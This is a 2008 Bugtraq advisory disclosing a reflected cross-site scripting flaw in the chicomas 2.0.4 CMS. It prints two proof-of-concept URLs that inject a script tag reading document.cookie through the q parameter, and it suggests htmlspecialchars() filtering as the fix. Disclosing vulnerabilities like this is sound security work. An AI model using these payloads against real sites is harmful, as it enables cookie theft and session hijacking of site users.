[prev in list] [next in list] [prev in thread] [next in thread] 

List:       bugtraq
Subject:    chicomas.2.0.4
From:       hadikiamarsi () hotmail ! com
Date:       2008-05-02 16:36:26
Message-ID: 20080502163626.28741.qmail () securityfocus ! com
[Download RAW message or body]


Author : Hadi Kiamarsi
----------------------------------------------------------------------------------
Discovered by : Hadi Kiamarsi
----------------------------------------------------------------------------------
Exploited By : Hadi Kiamarsi
----------------------------------------------------------------------------------
E-Mail : hadikiamarsi[at]hotmail.com
----------------------------------------------------------------------------------
WebSite : http://ircrash.com
----------------------------------------------------------------------------------
Our Team : ircrash
----------------------------------------------------------------------------------
IRCRASH Team Members : Dr.Crash Or Khashayar Fereidani - Hadi Kiamarsi - Malc0de - R3d.w0rm - Rasool Nasr
----------------------------------------------------------------------------------

CMS: chicomas.2.0.4 
Download CMS : http://garr.dl.sourceforge.net/sourceforge/chicomas/chicomas.2.0.4.zip 

----------------------------------------------------------------------------------

Exploit :

Method = POST

query : http://www.example.com/[chicomas]/index.php?q=>"><script>alert(document.cookie)</script>
query : http://www.example.com/[chicomas]/index.php?q="><script>alert(document.cookie)</script>

-----------------------------------------------------------------------------------

Solution :
 
you must filter special character in input via htmlspecialchar() function

-----------------------------------------------------------------------------------
[prev in list] [next in list] [prev in thread] [next in thread] 

Configure | About | News | Add a list | Sponsored by KoreLogic